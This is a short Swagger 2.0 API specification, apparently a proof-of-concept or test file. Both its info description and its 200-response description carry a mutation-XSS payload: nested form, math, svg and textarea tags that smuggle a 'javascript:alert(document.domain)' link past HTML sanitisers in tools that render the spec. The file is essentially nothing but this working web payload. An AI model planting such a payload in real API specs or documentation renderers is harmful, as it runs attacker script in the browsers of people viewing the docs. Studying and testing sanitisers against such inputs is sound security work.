swagger: '2.0'
info:
  version: "0.0.1"
  title: Example Title
  description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id='</textarea><a href=javascript:alert(document.domain)>nguny123</a>'></form>
paths:
  /:
    get:
      responses:
        200:
          description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id='</textarea><a href=javascript:alert(document.domain)>nguny123</a>'></form>
